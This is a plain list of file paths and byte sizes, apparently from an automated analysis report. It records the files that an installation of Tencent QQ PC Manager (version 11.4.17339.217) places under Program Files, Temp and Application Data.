    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMGameAssistantPlugin\QMGameAssistantPlugin.tpc (845 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\RemNPX.exe (1764 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\malware.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSMalFilter.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetSpeedTest\QMNetSpeedTestDll.dll (685 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdFilter.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\7z.dll (9608 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.dll (3780 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.tpc (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\libjpegturbo.dll (1844 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\qqpccommonmgr.dat (536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\msvcm80.dll (5237 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftGame.exe (3976 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1401.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\sCheck_Wireless.png (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\arkGraphic.dll (2436 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFeedBack.rdb (83 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMLogCtrl\QMLogCtrl.dll (6295 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1085.dat (447 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepProv.dll (14227 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TpkUpdate.exe (2888 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCClinic.png (931 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGuide.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCWifiSafe.png (816 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1412.dat (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFeedBack.exe (2948 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGCShellExt.dll (4899 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMMalCore.dll (5485 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\Check_Wireless.png (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HW_SPGameScore.dat (925 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmrtpplugin\QMRTPTipsConfig.dat (10 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1286.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMNetSpeedTest.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMGameSpeedup.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\RtpPage\RtpPage.rdb (278 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOBase.dll (4831 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUsbGuard.exe (6731 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCVulPage.rdb (1814 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVDescr.ipt (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.dll (5110 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHIPSLogPolicy.dll (1782 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\ATL80.dll (1213 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFileOpen.exe (5671 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1023.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysCleanPage\SysCleanPage.rdb (137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScanPluginInfo.xml (36 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.rdb (3252 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (468 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1091.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TavSignExcl.dat (22 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virinfo.def (52 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\libpng.dll (1413 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRealTimeSpeedup.rdb (241 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSpecTips\QMSpecTips.rdb (83 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tsvulsha.dat (109 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloaderInfo.dll (7562 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\arkGraphic.dll (3377 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\point.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_352.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\NodisturbOGList.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.tpc (959 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\JFZRConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\NetRepair.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\IEStartPage.dll (4329 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQRepairEx.exe (147 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_663.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1909.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\DownloaderMgrUI\DownloaderMgrUI.rdb (3744 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftTrayTips.exe (9887 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMInterface.dll (1208 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftTrayTips.rdb (1682 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\qmcloudinter\QMHipsProcessDecouple.dat (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVInterface.dll (1912 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\pinyin.lis (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\QQPCCommonMgr.rdb (15021 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRecommenderRes.dat (96 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10484.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_907.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\AVEngine.ini (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCWSCController.exe (1379 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCfix.dll (6903 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMAdFilter.png (545 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpkproxy.dll (3549 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpk.ini (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1227.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameSpeedup.rdb (310 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysstartupmgrjmp\StartupMgr.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCPatch.dll (4110 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCVulPlugin\QMSCVulPlugin.rdb (19 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibexcept.xml (16 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine_Cache\QMQuarantine.exe (3139 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysCleanPage\syscleanpage.tpc (798 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1095.dat (452 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibpower.xml (1526 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMNetworkMgr64.dll (4850 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ProcessManager.dll (2793 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCAVSetting.exe (5669 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_657.png (794 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1409.dat (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMTrojanScan\QMTrojanScan.rdb (5036 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1300.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSWebShieldX64.dat (3669 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_168.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GFFtsysCustom.dll (1654 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScanPluginMgr.dll (3813 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\MonitorConfig.etf (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy (808 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1029.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SysGarbageJmp.png (515 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.dll (2797 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\CubeConfig.ini (108 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Tencentdl.exe (10148 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr02.def (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\jgImage.dll (1160 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\tinyxml.dll (1558 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpktt.dll (27623 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.rdb (50 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCConfigCatalog.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMLogCtrl\QMLogCtrl.rdb (160 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUsbGuard.rdb (119 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\tab_icon_sys_opt_sys_homepage.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.dll (5469 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\libexpatw.dll (2500 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\RtpPage\RtpPage.dll (2800 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SoftUninstall\SoftUninstall.dll (6338 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\xp.png (26 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSwitchesMgrPlugin\QMSwitchesMgrPlugin.dll (851 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1629.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_715.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1100.dat (452 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\bugreport.exe (3465 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.rdb (100 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1609.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SysStartupMgrJmp.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMIESafeDll64.dll (3627 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\GarbageSoftIcon.zip (280 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMBDScanner.dat (29 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\FZLTCXHJW.TTF (9606 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.rdb (123 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.dll (4630 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSBlueScreenbak.xml (80 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1606.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\libexpatw.dll (995 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.tpc (684 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\pedc.dat (1615 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\FastUninstScpt.etf (95 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant.exe (2173 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSSafeEdit.dat (110 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QMHealthAssist_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_156.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1302.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\libjpegturbo.dll (2271 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSpecTips\QMSpecTips.dll (3650 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\QMGameAssistantPlugin.dll (2573 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SysOptLib.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\net_err.jpg (15 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1108.dat (455 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\StartupMgr.dll (11084 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\arkGraphic.dll (3675 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMNewsTips\QMNewsTips.tpc (727 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\browserlist.dat (13 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.tpc (905 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTencentNews.rdb (177 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.48.prf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virstr00.def (692 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCClinicSys.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCB1AndroidJmp.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\ClinicTrayConfig.xml (77 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepLibRisk.dat (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMDnsPlugin.png (409 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\jgImage.dll (884 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAssocScanLib.dat (1639 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmaplocal.dat (109 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1026.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\TurnOnAdapter.png (17 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAVProxy.dll (616 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCVulPlugin\QMSCVulPlugin.dll (3144 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\Check_Router.png (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\NetflowMgr.dll (2002 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\DZSConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1200.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQFileFlt.dll (19 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\I18N\2052\PGFStringBundle.xml (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\StartupLoad.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFileOpen.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\DownloaderMgrUI.png (309 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\CategoryConfig.xml (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qmsxtboxplugin.png (822 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\sqlite.dll (6069 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUL.dll (4721 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibforce.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdFilter.rdb (180 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\FtSysCommonMgrGF.dat (480 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\FIFAConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMArpHelperDll.dll (1958 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\oDayProtect.dll (374 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulFilter.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1604.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSkinMgr.dll (3189 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\AdfilterExtension.sext (177 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\DeskUpdate\GlobalMgr.db (190 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDns.dll (1439 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.tpc (698 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\PhoneMgrConfig.etf (322 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1010.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFileOpen.rdb (105 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\harddiskmark.etf (48 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.tpc (701 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\More.png (448 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Scc.dll (5756 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\autoinstall.etf (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\MobileSoftMgr.dll (1042 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1074.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\MalWare.dll (4960 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMMobileSettingCenter\QMMobileSettingCenter.dll (1973 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMClinicsettingcenter\QMClinicSettingCenter.tpc (747 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\RtpPage\RtpPage.png (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\CheckAv.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\NetworkFixInfo.xml (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1231.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_131.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVPedc.dll (1288 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\QMHPGarbageScan\HPGarbageScannerConf.xml (83 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMIpc.dll (1329 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.dll (4325 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1603.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\HPExternalScan\HPFirewareScanner.dll (1868 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibblackac.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCExternal.exe (1171 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrayPlugin.xml (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1500.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.rdb (255 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\tinyxml.dll (662 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1346.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAssocScan.dll (4867 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TxArp5.inf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\smanalyplugin\SMAnalyPlugin.dll (7213 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\Bin\SSOPlatform.dll (14138 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_691.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1406.dat (969 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.dll (6797 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\BrowserInfo.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCClinicSys\QQPCClinicSys.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.rdb (159 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetflowOpti\QMNetflowOptiDll.dll (56 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftGroup.etf (85 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOServicePlugin.etf (545 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetSpeedTest\NetSpeedTest.png (3 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle57.png (852 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\CubeSwitch.etf (935 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\videocardmark.etf (17 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.tpc (690 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOWorkFlowMgr.dll (4029 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.dll (3470 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1407.dat (1 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\AdBlock\adconfig.dat (6 bytes)
